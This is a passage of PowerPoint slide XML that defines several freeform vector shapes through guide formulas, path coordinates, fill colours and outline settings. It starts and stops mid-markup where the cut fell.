                  <a:gd name="T51" fmla="*/ 10 h 40"/>
                  <a:gd name="T52" fmla="*/ 51 w 92"/>
                  <a:gd name="T53" fmla="*/ 12 h 40"/>
                  <a:gd name="T54" fmla="*/ 51 w 92"/>
                  <a:gd name="T55" fmla="*/ 17 h 40"/>
                  <a:gd name="T56" fmla="*/ 45 w 92"/>
                  <a:gd name="T57" fmla="*/ 20 h 40"/>
                  <a:gd name="T58" fmla="*/ 40 w 92"/>
                  <a:gd name="T59" fmla="*/ 23 h 40"/>
                  <a:gd name="T60" fmla="*/ 43 w 92"/>
                  <a:gd name="T61" fmla="*/ 28 h 40"/>
                  <a:gd name="T62" fmla="*/ 47 w 92"/>
                  <a:gd name="T63" fmla="*/ 34 h 40"/>
                  <a:gd name="T64" fmla="*/ 45 w 92"/>
                  <a:gd name="T65" fmla="*/ 35 h 40"/>
                  <a:gd name="T66" fmla="*/ 40 w 92"/>
                  <a:gd name="T67" fmla="*/ 38 h 40"/>
                  <a:gd name="T68" fmla="*/ 34 w 92"/>
                  <a:gd name="T69" fmla="*/ 38 h 40"/>
                  <a:gd name="T70" fmla="*/ 33 w 92"/>
                  <a:gd name="T71" fmla="*/ 36 h 40"/>
                  <a:gd name="T72" fmla="*/ 29 w 92"/>
                  <a:gd name="T73" fmla="*/ 27 h 40"/>
                  <a:gd name="T74" fmla="*/ 22 w 92"/>
                  <a:gd name="T75" fmla="*/ 29 h 40"/>
                  <a:gd name="T76" fmla="*/ 19 w 92"/>
                  <a:gd name="T77" fmla="*/ 24 h 40"/>
                  <a:gd name="T78" fmla="*/ 9 w 92"/>
                  <a:gd name="T79" fmla="*/ 21 h 40"/>
                  <a:gd name="T80" fmla="*/ 2 w 92"/>
                  <a:gd name="T81" fmla="*/ 22 h 40"/>
                  <a:gd name="T82" fmla="*/ 1 w 92"/>
                  <a:gd name="T83" fmla="*/ 21 h 40"/>
                  <a:gd name="T84" fmla="*/ 2 w 92"/>
                  <a:gd name="T85" fmla="*/ 17 h 40"/>
                  <a:gd name="T86" fmla="*/ 4 w 92"/>
                  <a:gd name="T87" fmla="*/ 11 h 40"/>
                  <a:gd name="T88" fmla="*/ 1 w 92"/>
                  <a:gd name="T89" fmla="*/ 4 h 40"/>
                  <a:gd name="T90" fmla="*/ 2 w 92"/>
                  <a:gd name="T91" fmla="*/ 1 h 40"/>
                  <a:gd name="T92" fmla="*/ 6 w 92"/>
                  <a:gd name="T93" fmla="*/ 1 h 40"/>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92"/>
                  <a:gd name="T142" fmla="*/ 0 h 40"/>
                  <a:gd name="T143" fmla="*/ 92 w 92"/>
                  <a:gd name="T144" fmla="*/ 40 h 40"/>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92" h="40">
                    <a:moveTo>
                      <a:pt x="6" y="1"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="10" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="41" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="87" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="90" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="80" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="25"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="76" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="72" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="13"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="65" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="61" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="54" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="46" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="34" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="30"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="1"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36170" name="Freeform 303"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1673" y="2645"/>
                <a:ext cx="23" cy="10"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 4 w 23"/>
                  <a:gd name="T1" fmla="*/ 10 h 10"/>
                  <a:gd name="T2" fmla="*/ 0 w 23"/>
                  <a:gd name="T3" fmla="*/ 9 h 10"/>
                  <a:gd name="T4" fmla="*/ 0 w 23"/>
                  <a:gd name="T5" fmla="*/ 7 h 10"/>
                  <a:gd name="T6" fmla="*/ 0 w 23"/>
                  <a:gd name="T7" fmla="*/ 3 h 10"/>
                  <a:gd name="T8" fmla="*/ 0 w 23"/>
                  <a:gd name="T9" fmla="*/ 1 h 10"/>
                  <a:gd name="T10" fmla="*/ 0 w 23"/>
                  <a:gd name="T11" fmla="*/ 0 h 10"/>
                  <a:gd name="T12" fmla="*/ 2 w 23"/>
                  <a:gd name="T13" fmla="*/ 0 h 10"/>
                  <a:gd name="T14" fmla="*/ 6 w 23"/>
                  <a:gd name="T15" fmla="*/ 0 h 10"/>
                  <a:gd name="T16" fmla="*/ 9 w 23"/>
                  <a:gd name="T17" fmla="*/ 0 h 10"/>
                  <a:gd name="T18" fmla="*/ 20 w 23"/>
                  <a:gd name="T19" fmla="*/ 1 h 10"/>
                  <a:gd name="T20" fmla="*/ 22 w 23"/>
                  <a:gd name="T21" fmla="*/ 2 h 10"/>
                  <a:gd name="T22" fmla="*/ 23 w 23"/>
                  <a:gd name="T23" fmla="*/ 3 h 10"/>
                  <a:gd name="T24" fmla="*/ 22 w 23"/>
                  <a:gd name="T25" fmla="*/ 6 h 10"/>
                  <a:gd name="T26" fmla="*/ 21 w 23"/>
                  <a:gd name="T27" fmla="*/ 7 h 10"/>
                  <a:gd name="T28" fmla="*/ 19 w 23"/>
                  <a:gd name="T29" fmla="*/ 8 h 10"/>
                  <a:gd name="T30" fmla="*/ 17 w 23"/>
                  <a:gd name="T31" fmla="*/ 9 h 10"/>
                  <a:gd name="T32" fmla="*/ 12 w 23"/>
                  <a:gd name="T33" fmla="*/ 8 h 10"/>
                  <a:gd name="T34" fmla="*/ 7 w 23"/>
                  <a:gd name="T35" fmla="*/ 8 h 10"/>
                  <a:gd name="T36" fmla="*/ 4 w 23"/>
                  <a:gd name="T37" fmla="*/ 10 h 1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3"/>
                  <a:gd name="T58" fmla="*/ 0 h 10"/>
                  <a:gd name="T59" fmla="*/ 23 w 23"/>
                  <a:gd name="T60" fmla="*/ 10 h 10"/>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3" h="10">
                    <a:moveTo>
                      <a:pt x="4" y="10"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="10"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="96AFCF"/>
              </a:solidFill>
              <a:ln w="9525">
                <a:noFill/>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36171" name="Freeform 304"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1673" y="2645"/>
                <a:ext cx="23" cy="10"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 4 w 23"/>
                  <a:gd name="T1" fmla="*/ 10 h 10"/>
                  <a:gd name="T2" fmla="*/ 0 w 23"/>
                  <a:gd name="T3" fmla="*/ 9 h 10"/>
                  <a:gd name="T4" fmla="*/ 0 w 23"/>
                  <a:gd name="T5" fmla="*/ 7 h 10"/>
                  <a:gd name="T6" fmla="*/ 0 w 23"/>
                  <a:gd name="T7" fmla="*/ 3 h 10"/>
                  <a:gd name="T8" fmla="*/ 0 w 23"/>
                  <a:gd name="T9" fmla="*/ 1 h 10"/>
                  <a:gd name="T10" fmla="*/ 0 w 23"/>
                  <a:gd name="T11" fmla="*/ 0 h 10"/>
                  <a:gd name="T12" fmla="*/ 2 w 23"/>
                  <a:gd name="T13" fmla="*/ 0 h 10"/>
                  <a:gd name="T14" fmla="*/ 6 w 23"/>
                  <a:gd name="T15" fmla="*/ 0 h 10"/>
                  <a:gd name="T16" fmla="*/ 9 w 23"/>
                  <a:gd name="T17" fmla="*/ 0 h 10"/>
                  <a:gd name="T18" fmla="*/ 20 w 23"/>
                  <a:gd name="T19" fmla="*/ 1 h 10"/>
                  <a:gd name="T20" fmla="*/ 22 w 23"/>
                  <a:gd name="T21" fmla="*/ 2 h 10"/>
                  <a:gd name="T22" fmla="*/ 23 w 23"/>
                  <a:gd name="T23" fmla="*/ 3 h 10"/>
                  <a:gd name="T24" fmla="*/ 22 w 23"/>
                  <a:gd name="T25" fmla="*/ 6 h 10"/>
                  <a:gd name="T26" fmla="*/ 21 w 23"/>
                  <a:gd name="T27" fmla="*/ 7 h 10"/>
                  <a:gd name="T28" fmla="*/ 19 w 23"/>
                  <a:gd name="T29" fmla="*/ 8 h 10"/>
                  <a:gd name="T30" fmla="*/ 17 w 23"/>
                  <a:gd name="T31" fmla="*/ 9 h 10"/>
                  <a:gd name="T32" fmla="*/ 12 w 23"/>
                  <a:gd name="T33" fmla="*/ 8 h 10"/>
                  <a:gd name="T34" fmla="*/ 7 w 23"/>
                  <a:gd name="T35" fmla="*/ 8 h 10"/>
                  <a:gd name="T36" fmla="*/ 4 w 23"/>
                  <a:gd name="T37" fmla="*/ 10 h 1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3"/>
                  <a:gd name="T58" fmla="*/ 0 h 10"/>
                  <a:gd name="T59" fmla="*/ 23 w 23"/>
                  <a:gd name="T60" fmla="*/ 10 h 10"/>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3" h="10">
                    <a:moveTo>
                      <a:pt x="4" y="10"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="0" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="1"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="7" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="10"/>
                    </a:lnTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36172" name="Freeform 305"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1376" y="2765"/>
                <a:ext cx="53" cy="51"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 40 w 53"/>
                  <a:gd name="T1" fmla="*/ 12 h 51"/>
                  <a:gd name="T2" fmla="*/ 45 w 53"/>
                  <a:gd name="T3" fmla="*/ 19 h 51"/>
                  <a:gd name="T4" fmla="*/ 50 w 53"/>
                  <a:gd name="T5" fmla="*/ 24 h 51"/>
                  <a:gd name="T6" fmla="*/ 53 w 53"/>
                  <a:gd name="T7" fmla="*/ 26 h 51"/>
                  <a:gd name="T8" fmla="*/ 49 w 53"/>
                  <a:gd name="T9" fmla="*/ 26 h 51"/>
                  <a:gd name="T10" fmla="*/ 48 w 53"/>
                  <a:gd name="T11" fmla="*/ 29 h 51"/>
                  <a:gd name="T12" fmla="*/ 51 w 53"/>
                  <a:gd name="T13" fmla="*/ 36 h 51"/>
                  <a:gd name="T14" fmla="*/ 49 w 53"/>
                  <a:gd name="T15" fmla="*/ 42 h 51"/>
                  <a:gd name="T16" fmla="*/ 48 w 53"/>
                  <a:gd name="T17" fmla="*/ 46 h 51"/>
                  <a:gd name="T18" fmla="*/ 47 w 53"/>
                  <a:gd name="T19" fmla="*/ 47 h 51"/>
                  <a:gd name="T20" fmla="*/ 45 w 53"/>
                  <a:gd name="T21" fmla="*/ 41 h 51"/>
                  <a:gd name="T22" fmla="*/ 40 w 53"/>
                  <a:gd name="T23" fmla="*/ 39 h 51"/>
                  <a:gd name="T24" fmla="*/ 42 w 53"/>
                  <a:gd name="T25" fmla="*/ 43 h 51"/>
                  <a:gd name="T26" fmla="*/ 42 w 53"/>
                  <a:gd name="T27" fmla="*/ 45 h 51"/>
                  <a:gd name="T28" fmla="*/ 35 w 53"/>
                  <a:gd name="T29" fmla="*/ 41 h 51"/>
                  <a:gd name="T30" fmla="*/ 38 w 53"/>
                  <a:gd name="T31" fmla="*/ 35 h 51"/>
                  <a:gd name="T32" fmla="*/ 33 w 53"/>
                  <a:gd name="T33" fmla="*/ 31 h 51"/>
                  <a:gd name="T34" fmla="*/ 27 w 53"/>
                  <a:gd name="T35" fmla="*/ 28 h 51"/>
                  <a:gd name="T36" fmla="*/ 20 w 53"/>
                  <a:gd name="T37" fmla="*/ 24 h 51"/>
                  <a:gd name="T38" fmla="*/ 19 w 53"/>
                  <a:gd name="T39" fmla="*/ 20 h 51"/>
                  <a:gd name="T40" fmla="*/ 13 w 53"/>
                  <a:gd name="T41" fmla="*/ 16 h 51"/>
                  <a:gd name="T42" fmla="*/ 12 w 53"/>
                  <a:gd name="T43" fmla="*/ 18 h 51"/>
                  <a:gd name="T44" fmla="*/ 15 w 53"/>
                  <a:gd name="T45" fmla="*/ 20 h 51"/>
                  <a:gd name="T46" fmla="*/ 13 w 53"/>
                  <a:gd name="T47" fmla="*/ 26 h 51"/>
                  <a:gd name="T48" fmla="*/ 9 w 53"/>
                  <a:gd name="T49" fmla="*/ 22 h 51"/>
                  <a:gd name="T50" fmla="*/ 3 w 53"/>
                  <a:gd name="T51" fmla="*/ 19 h 51"/>
                  <a:gd name="T52" fmla="*/ 1 w 53"/>
                  <a:gd name="T53" fmla="*/ 14 h 51"/>
                  <a:gd name="T54" fmla="*/ 4 w 53"/>
                  <a:gd name="T55" fmla="*/ 9 h 51"/>
                  <a:gd name="T56" fmla="*/ 0 w 53"/>
                  <a:gd name="T57" fmla="*/ 4 h 51"/>
                  <a:gd name="T58" fmla="*/ 3 w 53"/>
                  <a:gd name="T59" fmla="*/ 2 h 51"/>
                  <a:gd name="T60" fmla="*/ 4 w 53"/>
                  <a:gd name="T61" fmla="*/ 0 h 51"/>
                  <a:gd name="T62" fmla="*/ 20 w 53"/>
                  <a:gd name="T63" fmla="*/ 3 h 51"/>
                  <a:gd name="T64" fmla="*/ 25 w 53"/>
                  <a:gd name="T65" fmla="*/ 3 h 51"/>
                  <a:gd name="T66" fmla="*/ 32 w 53"/>
                  <a:gd name="T67" fmla="*/ 7 h 51"/>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53"/>
                  <a:gd name="T103" fmla="*/ 0 h 51"/>
                  <a:gd name="T104" fmla="*/ 53 w 53"/>
                  <a:gd name="T105" fmla="*/ 51 h 51"/>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53" h="51">
                    <a:moveTo>
                      <a:pt x="34" y="5"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="40" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="50" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="34"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="49" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="46"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="39"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="42" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="41"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="38"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="38" y="35"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="36" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="29"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="28"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="27"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="19" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="16"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="15" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="12" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="19"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="17"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="4" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="23" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
